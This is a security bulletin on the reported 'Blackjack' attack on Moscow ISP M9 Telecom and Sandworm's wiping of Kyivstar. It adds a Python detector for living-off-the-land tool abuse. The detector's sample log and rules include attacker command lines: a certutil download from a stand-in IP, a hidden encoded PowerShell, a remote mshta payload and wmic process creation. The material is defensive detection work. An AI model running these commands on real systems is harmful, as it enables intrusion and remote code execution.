Ukrainian “Blackjack” Hackers Take Out Russian ISP

Summary:
A group linked to Ukraine’s SBU has allegedly launched a destructive cyber-attack against a Moscow ISP in retaliation for Russia’s takedown of Kyivstar last month. According to reports, the group, called “Blackjack”, deleted 20 TB of data at M9 Telecom, leaving some residents of Moscow without Internet service.

In a post on its Telegram channel, the group described the attack as “just a continuation of the series of warm-up acts of retaliation for the civilian Kyivstar before the grown-up boom.” While the Blackjack operators claimed that all of the ISP’s data and backups were deleted, M9 Telecom’s website appears to still be functioning.

Security Officer Comments:
The attack appears to be a response to a Russian operation carried out by the notorious state-backed Sandworm group, which wiped thousands of virtual servers and PCs on the network of Kyivstar, Ukraine’s largest mobile operator. The Sandworm attack is said to be the most destructive since Russia’s invasion. According to Reuters, Sandworm dwelt undetected inside Kyivstar’s network for months before the attack.

The Sandworm actors allegedly used living-off-the-land (LOTL) techniques to remain hidden. LOTL attacks are hard to detect because they rely on legitimate, already-installed administrative tools and binaries, so the resulting activity and traffic look like the normal operations that security controls expect and allow.

Suggested Corrections:
The article recommends awareness and monitoring of the usage of tools commonly abused in LOTL attacks. Defending against known and unknown threats requires shared awareness, collaboration, transparent system knowledge, auditing, monitoring and user training.
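As an added example of the kind of monitoring recommended above (this is not code from the article, from Kyivstar or from any vendor), the following Python script scans process-creation events for built-in Windows binaries invoked with arguments that are rarely seen in legitimate use, the signature of LOTL tool abuse. The CSV log format, the hosts, users and command lines are all constructed for illustration; the rule set is a small, hand-picked subset and is an assumption, not a complete catalogue.

```python
"""Toy detector for living-off-the-land (LOTL) tool abuse.

Added example, not code from the article or any vendor. It scans
process-creation records (a constructed, Sysmon-like CSV) and flags
built-in Windows binaries being invoked with arguments that are rarely
legitimate: download cradles, encoded commands, script hosts fed URLs,
and shells spawned by Office applications.
"""
import csv
import io
import re
from dataclasses import dataclass

# Constructed sample events (assumed format): host, user, parent image, command line.
SAMPLE_LOG = r'''host,user,parent,command_line
srv01,CORP\alice,explorer.exe,"certutil -hashfile C:\temp\setup.msi SHA256"
srv01,CORP\alice,cmd.exe,"certutil -urlcache -split -f http://203.0.113.5/a.txt C:\temp\a.txt"
ws22,CORP\bob,WINWORD.EXE,"powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"
ws22,CORP\bob,explorer.exe,"powershell Get-ChildItem C:\Users\bob"
dc01,CORP\svc_backup,services.exe,"wmic process call create ""cmd /c whoami"""
ws07,CORP\carol,cmd.exe,"mshta http://203.0.113.5/p.hta"
ws07,CORP\carol,explorer.exe,"rundll32 shell32.dll,Control_RunDLL"
'''


@dataclass(frozen=True)
class Rule:
    name: str          # human-readable alert name
    binary: str        # image name (without .exe) whose abuse we look for
    args: re.Pattern   # argument pattern that is rarely legitimate


# Assumed, illustrative rule set: each pairs a legitimate binary with arguments
# that are common in attacker usage but rare in day-to-day administration.
RULES = [
    Rule("certutil download/decode", "certutil", re.compile(r"-urlcache|-decode", re.I)),
    Rule("powershell encoded/hidden/download", "powershell",
         re.compile(r"-e(?:nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden|downloadstring|\biex\b", re.I)),
    Rule("mshta remote/script payload", "mshta", re.compile(r"https?://|javascript:|vbscript:", re.I)),
    Rule("regsvr32 remote scriptlet", "regsvr32", re.compile(r"/i:https?://|scrobj\.dll", re.I)),
    Rule("rundll32 script payload", "rundll32", re.compile(r"javascript:|https?://", re.I)),
    Rule("wmic process create", "wmic", re.compile(r"process\s+call\s+create", re.I)),
    Rule("bitsadmin download", "bitsadmin", re.compile(r"/transfer|/addfile", re.I)),
]

OFFICE_PARENTS = {"winword", "excel", "powerpnt", "outlook"}
SHELL_CHILDREN = {"cmd", "powershell", "pwsh", "wscript", "cscript", "mshta",
                  "regsvr32", "rundll32", "certutil"}


def image_name(path_or_cmd: str) -> str:
    """Reduce 'C:\\Windows\\System32\\certutil.exe -x' or 'WINWORD.EXE' to 'certutil' / 'winword'."""
    s = path_or_cmd.strip()
    if s.startswith('"'):                      # quoted path with spaces
        token = s[1:].split('"', 1)[0]
    else:
        token = s.split(None, 1)[0] if s else ""
    name = re.split(r"[\\/]", token)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def analyze_event(parent: str, command_line: str) -> list[str]:
    """Return the names of every rule the event triggers (empty list if benign)."""
    binary = image_name(command_line)
    hits = [r.name for r in RULES if r.binary == binary and r.args.search(command_line)]
    # Office applications have no business spawning shells or script hosts.
    if image_name(parent) in OFFICE_PARENTS and binary in SHELL_CHILDREN:
        hits.append("office application spawned " + binary)
    return hits


def detect(log_text: str) -> list[dict]:
    """Run every rule over a CSV log and return one alert dict per rule hit."""
    alerts = []
    for row in csv.DictReader(io.StringIO(log_text)):
        for rule in analyze_event(row["parent"], row["command_line"]):
            alerts.append({"host": row["host"], "user": row["user"],
                           "rule": rule, "command_line": row["command_line"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['host']} {a['user']}: [{a['rule']}] {a['command_line']}")
```

On the constructed sample this raises five alerts (the certutil download, the Office-spawned encoded PowerShell twice, the wmic process creation and the mshta URL) and stays silent on the benign certutil hashing, directory listing and Control Panel invocations. In a real deployment the input would be Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled; the point is that the binaries themselves are allowed and expected, so the detection has to key on arguments and parent-child context rather than on the tool's presence.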

Link(s):
https://www.infosecurity-magazine.com/news/ukrainian-blackjack-hackers/